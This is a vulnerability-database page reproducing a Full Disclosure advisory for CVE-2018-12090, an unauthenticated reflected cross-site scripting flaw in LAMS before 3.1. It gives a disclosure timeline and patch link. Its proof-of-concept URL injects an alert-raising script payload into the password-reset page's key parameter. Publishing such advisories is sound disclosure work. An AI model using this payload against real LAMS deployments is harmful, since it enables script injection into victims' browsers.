Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-12090

Source

                # Exploit Title: LAMS &lt; 3.1 - Unauthenticated Reflected XSS
# Date: 2018-08-06
# Exploit Author: Nikola Kojic
# Website: https://ras-it.rs/
# Vendor Homepage: https://www.lamsfoundation.org/
# Software Link: https://www.lamsfoundation.org/downloads_home.htm
# Category: Web Application
# Platform: Java
# Version: &lt; 3.1
# CVE : 2018-12090

1. Vendor Description:

2. Technical Details and Exploitation:

3. Proof of Concept:
http://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E

4. Solution:
The vendor has fixed the issues and released the patches.

https://code.lamsfoundation.org/fisheye/changelog/lams-github?cs=6825a5272d3a48f8cafa370b0e0107cc9077cff6

5. Timeline:
2018-06-07: Discovered
2018-06-08: Vendor notified
2018-06-08: Vendor replies
2018-06-11: CVE number requested
2018-06-11: CVE number assigned
2018-06-15: Patch released
2018-08-05: Public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives &amp; RSS: http://seclists.org/fulldisclosure/

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2018-12090 - LAMS < 3.1 Unauthenticated Cross-Site Scripting

Vulmon Search

About

Products

Connect